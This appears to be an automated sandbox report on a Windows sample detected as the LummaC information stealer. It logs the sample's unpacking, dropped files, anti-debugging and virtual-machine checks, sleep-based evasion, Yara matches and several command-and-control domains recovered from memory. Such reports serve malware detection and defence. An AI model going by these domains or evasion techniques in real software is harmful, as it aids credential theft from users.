Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Unpacked PE file: 1.2.5759.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.CRT:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Unpacked PE file: 0.2.wN8pQhRNnu.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Unpacked PE file: 1.2.5759.tmp.exe.400000.0.unpack

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00410766 push ecx; ret	0_2_00410779
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0043DB77 push dword ptr [esp+ecx-75h]; iretd	0_2_0043DB7B
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0040FD8C push ecx; ret	0_2_0040FD9F
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_009ED085 push 00000003h; ret	0_2_009ED089
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_009EB2DA push es; iretd	0_2_009EB2EB
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_009EF692 pushad ; ret	0_2_009EF6AE
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_009ECBE4 pushad ; ret	0_2_009ECC0C
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_024809CD push ecx; ret	0_2_024809E0
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_024A799F push esp; retf	0_2_024A79A7
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0248CE18 push ss; retf	0_2_0248CE1D
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0247FFF3 push ecx; ret	0_2_02480006
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_024A7F9D push esp; retf	0_2_024A7F9E
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_024A9DE8 pushad ; retf	0_2_024A9DEF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0041ACF6 push esp; iretd	1_2_0041ACFF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043F6EE push esp; iretd	1_2_0043F6EF
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0043BF00 push eax; mov dword ptr [esp], 49484716h	1_2_0043BF01
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0094C167 push eax; mov dword ptr [esp], 49484716h	1_2_0094C168
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0094F555 push esp; iretd	1_2_0094F556
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0092AF5D push esp; iretd	1_2_0092AF66
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009BDAD5 pushad ; ret	1_2_009BDADA
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009BDD5B push ebp; ret	1_2_009BDD60

Source: wN8pQhRNnu.exe	Static PE information: section name: .text entropy: 7.549145641916041
Source: ScreenUpdateSync[1].exe.0.dr	Static PE information: section name: .text entropy: 7.371146835595198
Source: 5759.tmp.exe.0.dr	Static PE information: section name: .text entropy: 7.371146835595198

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	File created: C:\Users\user\AppData\Local\Temp\5759.tmp.exe			Jump to dropped file
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe			Jump to dropped file

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_0040E974 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0040E974

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Window / User API: threadDelayed 9637

Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

graph_0-64196

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

API coverage: 5.1 %

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe TID: 3524	Thread sleep count: 350 > 30	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe TID: 3524	Thread sleep time: -252700s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe TID: 3524	Thread sleep count: 9637 > 30	Jump to behavior
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe TID: 3524	Thread sleep time: -6957914s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe TID: 1904	Thread sleep time: -120000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Last function: Thread delayed
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Last function: Thread delayed

Source: Amcache.hve.7.dr	Binary or memory string: VMware
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.7.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: wN8pQhRNnu.exe, 00000000.00000002.4130595002.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1861891488.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000002.2124568504.0000000000A31000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906542241.0000000000A24000.00000004.00000020.00020000.00000000.sdmp, 5759.tmp.exe, 00000001.00000003.1906635623.0000000000A30000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: 5759.tmp.exe, 00000001.00000002.2124450626.00000000009F6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.7.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: wN8pQhRNnu.exe, 00000000.00000002.4130595002.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A78000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWW
Source: Amcache.hve.7.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.7.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.7.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: wN8pQhRNnu.exe, 00000000.00000003.4008558725.0000000000A47000.00000004.00000020.00020000.00000000.sdmp, wN8pQhRNnu.exe, 00000000.00000002.4130595002.0000000000A48000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWP%
Source: Amcache.hve.7.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.7.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.7.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Code function: 1_2_0043A9B0 LdrInitializeThunk,

1_2_0043A9B0

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_0042A3D3

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_0041EC5E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_0041EC5E

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0042FE5F mov eax, dword ptr fs:[00000030h]	0_2_0042FE5F
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_009E9D6B push dword ptr fs:[00000030h]	0_2_009E9D6B
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_024A00C6 mov eax, dword ptr fs:[00000030h]	0_2_024A00C6
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0247092B mov eax, dword ptr fs:[00000030h]	0_2_0247092B
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_02470D90 mov eax, dword ptr fs:[00000030h]	0_2_02470D90
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_0091092B mov eax, dword ptr fs:[00000030h]	1_2_0091092B
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_00910D90 mov eax, dword ptr fs:[00000030h]	1_2_00910D90
Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe	Code function: 1_2_009BA963 push dword ptr fs:[00000030h]	1_2_009BA963

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_0043BBC1 GetProcessHeap,

0_2_0043BBC1

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0042A3D3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0042A3D3
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_004104D3 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_004104D3
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00410666 SetUnhandledExceptionFilter,	0_2_00410666
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0040F911 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0040F911
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0249A63A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0249A63A
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0248073A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_0248073A
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_0247FB78 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_0247FB78
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_024808CD SetUnhandledExceptionFilter,	0_2_024808CD

HIPS / PFW / Operating System Protection Evasion

LummaC encrypted strings found

Source: 5759.tmp.exe	String found in binary or memory: debonairnukk.xyz
Source: 5759.tmp.exe	String found in binary or memory: diffuculttan.xyz
Source: 5759.tmp.exe	String found in binary or memory: effecterectz.xyz
Source: 5759.tmp.exe	String found in binary or memory: deafeninggeh.biz
Source: 5759.tmp.exe	String found in binary or memory: immureprech.biz

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Process created: C:\Users\user\AppData\Local\Temp\5759.tmp.exe "C:\Users\user\AppData\Local\Temp\5759.tmp.exe"

Jump to behavior

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_0041077B cpuid

0_2_0041077B

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_0043B00A
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetLocaleInfoW,	0_2_004351C0
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: EnumSystemLocalesW,	0_2_0043B2CD
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: EnumSystemLocalesW,	0_2_0043B282
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: EnumSystemLocalesW,	0_2_0043B368
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B3F5
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetLocaleInfoW,	0_2_0043B645
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_0043B76E
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetLocaleInfoW,	0_2_0043B875
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_0043B942
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: EnumSystemLocalesW,	0_2_00434DCD
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	0_2_024AB271
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: EnumSystemLocalesW,	0_2_024A5034
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetLocaleInfoW,	0_2_024A5427
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: EnumSystemLocalesW,	0_2_024AB4E9
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: EnumSystemLocalesW,	0_2_024AB534
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: EnumSystemLocalesW,	0_2_024AB5CF
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetLocaleInfoW,	0_2_024ABADC
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	0_2_024ABBA9
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetLocaleInfoW,	0_2_024AB8AC
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	0_2_024AB9D5

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_004103CD GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_004103CD

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe

Code function: 0_2_004163EA GetVersionExW,Concurrency::details::platform::InitializeSystemFunctionPointers,Concurrency::details::WinRT::Initialize,__CxxThrowException@8,

0_2_004163EA

Source: C:\Users\user\AppData\Local\Temp\5759.tmp.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: Amcache.hve.7.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.7.dr	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.5759.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.5759.tmp.exe.2510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.5759.tmp.exe.2510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.5759.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1793934788.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: 1.2.5759.tmp.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.5759.tmp.exe.2510000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.3.5759.tmp.exe.2510000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.5759.tmp.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000002.2124309518.0000000000910000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.2124075587.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1793934788.0000000002510000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_004218CC Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::InternalContextBase::SwitchOut,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::InternalContextBase::SwitchTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,	0_2_004218CC
Source: C:\Users\user\Desktop\wN8pQhRNnu.exe	Code function: 0_2_00420BF6 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::ReleaseInternalContext,Concurrency::details::SchedulerBase::GetInternalContext,	0_2_00420BF6
